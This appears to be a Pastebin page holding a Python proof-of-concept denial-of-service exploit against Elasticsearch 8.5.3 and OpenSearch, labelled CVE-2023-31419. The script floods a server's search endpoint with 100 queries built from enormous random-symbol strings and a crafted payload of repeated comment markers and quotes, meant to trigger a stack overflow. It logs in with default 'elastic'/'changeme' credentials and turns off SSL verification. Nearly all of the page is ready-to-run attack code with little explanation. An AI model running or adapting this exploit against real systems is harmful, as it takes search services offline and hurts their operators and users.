Advertisement
FlyFar

Elasticsearch - StackOverflow DoS

Feb 9th, 2024
734
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.55 KB | Cybersecurity | 0 0
  1. # Exploit Author: TOUHAMI KASBAOUI
  2. # Vendor Homepage: https://elastic.co/
  3. # Version: 8.5.3 / OpenSearch
  4. # Tested on: Ubuntu 20.04 LTS
  5. # CVE : CVE-2023-31419
  6. # Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419
  7.  
  8. import requests
  9. import random
  10. import string
  11.  
  12. es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL
  13. index_name = '*'
  14.  
  15. payload = "/*" * 10000 + "\\" +"'" * 999
  16.  
  17. verify_ssl = False
  18.  
  19. username = 'elastic'
  20. password = 'changeme'
  21.  
  22. auth = (username, password)
  23.  
  24. num_queries = 100
  25.  
  26. for _ in range(num_queries):
  27.     symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
  28.     search_query = {
  29.         "query": {
  30.             "match": {
  31.                 "message": (symbols * 9000) + payload
  32.             }
  33.         }
  34.     }
  35.  
  36.     print(f"Query {_ + 1} - Search Query:")
  37.  
  38.     search_endpoint = f'{es_url}/{index_name}/_search'
  39.     response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)
  40.  
  41.     if response.status_code == 200:
  42.         search_results = response.json()
  43.  
  44.         print(f"Query {_ + 1} - Response:")
  45.         print(search_results)
  46.  
  47.         total_hits = search_results['hits']['total']['value']
  48.         print(f"Query {_ + 1}: Total hits: {total_hits}")
  49.  
  50.         for hit in search_results['hits']['hits']:
  51.             source_data = hit['_source']
  52.             print("Payload result: {search_results}")
  53.     else:
  54.         print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")
  55.            
Tags: DoS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement